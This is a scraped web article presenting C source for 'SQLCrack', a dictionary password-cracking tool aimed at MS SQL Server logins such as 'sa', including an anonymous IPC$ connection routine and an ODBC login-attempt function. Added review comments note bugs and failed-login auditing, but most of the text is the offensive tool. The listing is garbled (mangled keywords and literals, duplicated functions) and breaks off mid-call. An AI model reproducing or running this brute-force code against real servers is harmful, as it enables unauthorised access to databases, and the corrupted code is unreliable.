How to crack the password of MS SQL SERVER

Source: Internet
Author: User
This article focuses on how to detect the password of an MS SQL Server account. The following example walks through the entire password-detection process.

// Header file used by the program
// Define global variables

 

// Program-wide state shared by the functions in this listing.
// NOTE(review): the capitalised keywords and identifiers (Char, Int, Target,
// Passwd, ...) look like an artefact of the page's conversion; the functions
// further down refer to `target` and `passwd` in lower case.
Char dict [20000] [40], // Candidate passwords read from the dictionary file: 20000 slots of 40 bytes each
UserName [40], // Login name to test
Target [40], // Target server
Passwd [40]; // The candidate that was accepted, copied here by SQLCheck
Int total = 0; // Number of words loaded into dict
BOOL Cracked = FALSE; // Set to TRUE by SQLCheck when a candidate is accepted
//
// Function: usage
// Purpose: prints the program banner and the command-line help text, then returns.
// Takes no arguments and returns nothing.
// NOTE(review): the string literal below is damaged on this page (a space after
// each backslash, forum [Email] markup inside the literal); it is reproduced as
// found. The help text names four arguments: ip, UserName, dict, SleepTime.
//
Void usage ()
{
Printf ("\ nPower by analyzer <〈
[Email] inmiao@163.com [/email]
> 〉"
"\ Nhttp: // www.infocn.com"
"\ NUsage: SQLCrack <ip> <UserName> <dict> <SleepTime [20-1000]>"
"\ NExample: SQLCrack 192.168.0.1 sa c: \ pwd. dic 50 \ n"); return;
}
//
// Function: ReadDic
// Purpose: reads the dictionary file line by line into the global array dict
//          and counts the entries in the global total.
// Parameter: dic - path of the dictionary file, opened in text read mode.
// Returns: 1 if the file cannot be opened, 0 otherwise (including when the
//          20000-entry limit cuts the read short).
//
Int ReadDic (char * dic)
{
FILE * fp;
Char tmp [40];
// Open the dictionary file
// NOTE(review): the single `=` before NULL is presumably a comparison that lost a
// character in the page conversion; as printed it is an assignment.
If (fp = fopen (dic, "r") = NULL)
{
Printf ("\ nCaN' t open % s ", dic );
Return 1;
}
While (! Feof (fp ))
{
// Read one line (at most 39 characters) into the temporary buffer.
// A longer line is returned by fgets in several pieces, so it ends up as
// several separate entries.
If (fgets (tmp, 40, fp) = NULL)
Break;
// Copy everything except the last character, which is assumed to be the
// line feed kept by fgets.
// NOTE(review): strncpy with this length never writes a terminator; the entry is
// only terminated because dict is file-scope storage (zero-initialised) and each
// slot is written once. A final line with no trailing newline loses its last
// real character.
Strncpy (dict [total], tmp, strlen (tmp)-1 );
Total ++;
// dict is declared as dict [20000] [40], so stop reading once 20000 entries
// have been stored; continuing would write past the end of the array.
// The limit has to be changed together with the array declaration.
If (total> = 20000)
Break;
}
Fclose (fp );
Return 0;
}
//
// Function: ConnIPC
// Purpose: establishes an IPC$ connection to the named host through
//          WNetAddConnection2, passing empty strings for both the password and
//          the user name arguments.
// Parameter: RemoteName - host part of the remote name; the share suffix is
//            appended to it here.
// Returns: 0 when WNetAddConnection2 reports NO_ERROR, 1 otherwise.
// NOTE(review): a connection made with empty credentials is an anonymous session;
// hosts that restrict anonymous access to IPC$ will refuse it.
//
Int ConnIPC (char * RemoteName)
{
NETRESOURCE nr;
DWORD flags = CONNECT_UPDATE _PROFILE;
// NOTE(review): declared here as rn/LN but used below as RN/LN - case drift from
// the page conversion, presumably the same two buffers.
Tchar rn [30] = "",
LN [5] = "";
// NOTE(review): both strcat calls are unbounded; a RemoteName of more than about
// 23 characters overruns the 30-element buffer. The caller is not visible here,
// so whether the argument is length-checked is unknown.
Strcat (RN, RemoteName );
Strcat (RN, "\ ipc $ ");
// Fill in the fields of the NETRESOURCE structure used for the call; nr is not
// zeroed first, so the fields not assigned below keep indeterminate values.
Nr. dwType = RESOURCETYPE_DISK;
Nr. lpLocalName = (LPTSTR) & LN;
Nr. lpRemoteName = (LPTSTR) & RN;
Nr. lpProvider = NULL;
// NOTE(review): `= NO_ERROR` is presumably `== NO_ERROR` before conversion.
If (WNetAddConnection2 (& nr, (LPSTR) "", (LPSTR) "", flags) = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function: DelIPC
// Purpose: disconnects the IPC$ session to the named host through
//          WNetCancelConnection2.
// Parameter: RemoteName - host part of the remote name; the share suffix is
//            appended to it here.
// Returns: 0 when the call reports NO_ERROR, 1 otherwise.
//
Int DelIPC (char * RemoteName)
{
DWORD ret;
TCHAR lpName [30] = "";
// NOTE(review): unbounded strcat into a 30-element buffer, same limit as in
// ConnIPC; a long RemoteName overruns it.
Strcat (lpName, RemoteName );
Strcat (lpName, "\ ipc $ ");
// TRUE as the last argument asks for the disconnect to be forced.
Ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE, TRUE );
// NOTE(review): `ret = NO_ERROR` is presumably `ret == NO_ERROR` before conversion.
If (ret = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function: SQLCheck
// Purpose: makes one ODBC connection attempt to the SQL Server named in the
//          global target, as the global UserName, with the password passed in.
//          On success it sets the global Cracked to TRUE and copies the password
//          into the global passwd.
// Parameter: pPwd - pointer to the candidate password, cast to char * below.
// Returns: always 0; the outcome is reported only through Cracked and passwd.
// NOTE(review): the DWORD WINAPI (PVOID) signature suggests this is used as a
// thread entry point (caller not shown); Cracked and passwd are written without
// any synchronisation visible in this listing.
// NOTE(review): seen from the server, every call is one complete login attempt.
// Failed-login auditing (error 18456 in the SQL Server error log) is where a run
// of these shows up, and a password/lockout policy on SQL logins limits it.
//
DWORD WINAPI SQLCheck (PVOID pPwd)
{
// Define local variables
Char szBuffer [1025];
Char * pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode; // odbc api running return value SCHAR ConnStr [200]; // connectionDatabaseString
// NOTE(review): on this page the ConnStr declaration has been folded into the
// comment on the line above; the repeated copy of this function later in the
// listing shows `SCHAR ConnStr [200];` on a line of its own.
// Obtain the password passed for testing
Pwd = (char *) pPwd;
// Build the ODBC connection string piece by piece.
// NOTE(review): every piece is appended with unbounded strcpy/strcat into the
// 200-byte ConnStr. It fits only while target, UserName and pwd stay within
// their 40-byte arrays; how those are filled is not shown here. The values are
// inserted as-is, so a value containing ';' changes how the string is parsed.
Strcpy (ConnStr, "DRIVER = {SQL Server}; SERVER = ");
Strcat (ConnStr, target );
Strcat (ConnStr, "; UID = ");
Strcat (ConnStr, UserName );
Strcat (ConnStr, "; PWD = ");
Strcat (ConnStr, pwd );
Strcat (ConnStr, "; DATABASE = master ");
// Puts (ConnStr );
// Create an environment handle for the database application
If (SQLAllocHandle (SQL _HANDLE_ENV, SQL _NULL_HANDLE, & henv )! = SQL _SUCCESS)
{
Printf ("\ nAllocate environment handle failed. \ n ");
Return 0;
}
// Printf ("henv ..");
// Select ODBC 3 behaviour on the environment; release the environment handle
// if that fails.
If (SQLSetEnvAttr (henv, SQL _ATTR_ODBC_VERSION, (SQLPOINTER)
SQL _OV_ODBC3, SQL _IS_INTEGER )! = SQL _SUCCESS)
{
Printf ("\ nSet the ODBC version environment attribute failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("ODBC ver ..");
// Create a connection handle; release the environment handle if that fails.
If (retcode = SQLAllocHandle (SQL _HANDLE_DBC, henv, (SQLHDBC FAR
*) & Hdbc ))! = SQL _SUCCESS)
{
Printf ("\ nAllocate connection handle failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("hdbc ..");
// Connect to the data source. szBuffer receives the completed connection
// string and swStrLen its length; neither is used afterwards.
Retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr), szBuffer, sizeof
(SzBuffer), & swStrLen,
SQL _DRIVER_COMPLETE_REQUIRED );
// Printf ("conn ..");
// Anything other than SQL_SUCCESS / SQL_SUCCESS_WITH_INFO counts as a failed
// attempt. NOTE(review): the single `&` is presumably `&&` before conversion.
If (retcode! = SQL _SUCCESS & retcode! = SQL _SUCCESS_WITH_INFO)
{
// Connection failed: release both handles and end the function
// Printf ("\ nCouldn't connect to % s MSSQL server. \ n", target );
SQLFreeHandle (SQL _HANDLE_DBC, hdbc );
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// The connection was accepted: record the result in the globals.
// NOTE(review): the accepted password stays in the global passwd in clear text
// and is not wiped anywhere in this listing.
Cracked = TRUE;
Strcpy (passwd, pwd );
// Puts (szBuffer );
// Display the string connecting to the remote database
// Disconnect
SQLDisconnect (hdbc );
// Printf ("disconn ..");
// Release the connection handle
SQLFreeHandle (SQL _HANDLE_DBC, hdbc );
// Printf ("free hdbc ..");
// Release the environment handle
SQLFreeHandle (SQL _HANDLE_ENV, henv );
// Printf ("free henv .. \ n ");
Return 0;
}
//
// Function: DelIPC
// Purpose: disconnects the IPC$ session to the named host through
//          WNetCancelConnection2.
// Parameter: RemoteName - host part of the remote name; the share suffix is
//            appended to it here.
// Returns: 0 when the call reports NO_ERROR, 1 otherwise.
// NOTE(review): this is a repeat of the DelIPC definition that appears earlier in
// the listing; the page prints the function twice.
//
Int DelIPC (char * RemoteName)
{
DWORD ret;
TCHAR lpName [30] = "";
// NOTE(review): unbounded strcat into a 30-element buffer; a long RemoteName
// overruns it.
Strcat (lpName, RemoteName );
// TRUE as the last argument asks for the disconnect to be forced.
Strcat (lpName, "\ ipc $"); ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE,
TRUE );
// NOTE(review): `ret = NO_ERROR` is presumably `ret == NO_ERROR` before conversion.
If (ret = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function SQLCheck
// Function: Try to connect to SQL Server with different passwords to detect the correct password
//
Dword winapi SQLCheck (PVOID pPwd)
{
// Define local variables
Char szBuffer [1025];
Char * pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode; // odbc api running return value
SCHAR ConnStr [200]; // connection string
// Obtain the password passed for testing
Pwd = (char *) pPwd;
// Construct database connection characters
Strcpy (ConnStr, "DRIVER = {SQL Server}; SERVER = ");
Strcat (ConnStr, target );
Strcat (ConnStr, "; UID = ");
Strcat (ConnStr, UserName );
Strcat (ConnStr, "; PWD = ");
Strcat (ConnStr, pwd );
Strcat (ConnStr, "; DATABASE = master ");
// Puts (ConnStr );
// Create an environment handle for the database application
If (SQLAllocHandle (SQL _HANDLE_ENV, SQL _NULL_HANDLE, & henv )! = SQL _SUCCESS ){
Printf ("\ nAllocate environment handle failed. \ n ");
Return 0;
}
// Printf ("henv ..");
// Set the ODBC version environment
If (SQLSetEnvAttr (henv, SQL _ATTR_ODBC_VERSION, (SQLPOINTER)
SQL _OV_ODBC3, SQL _IS_INTEGER )! = SQL _SUCCESS)
{
Printf ("\ nSet the ODBC version environment attribute failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("ODBC ver ..");
// Create a connection handle
If (retcode = SQLAllocHandle (SQL _HANDLE_DBC, henv, (SQLHDBC FAR
*) & Hdbc ))! = SQL _SUCCESS)
{
Printf ("\ nAllocate connection handle failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("hdbc ..");
// Connect to the data source
Retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr ),
SzBuffer, sizeof (szBuffer ),&

Source: jieshiwang
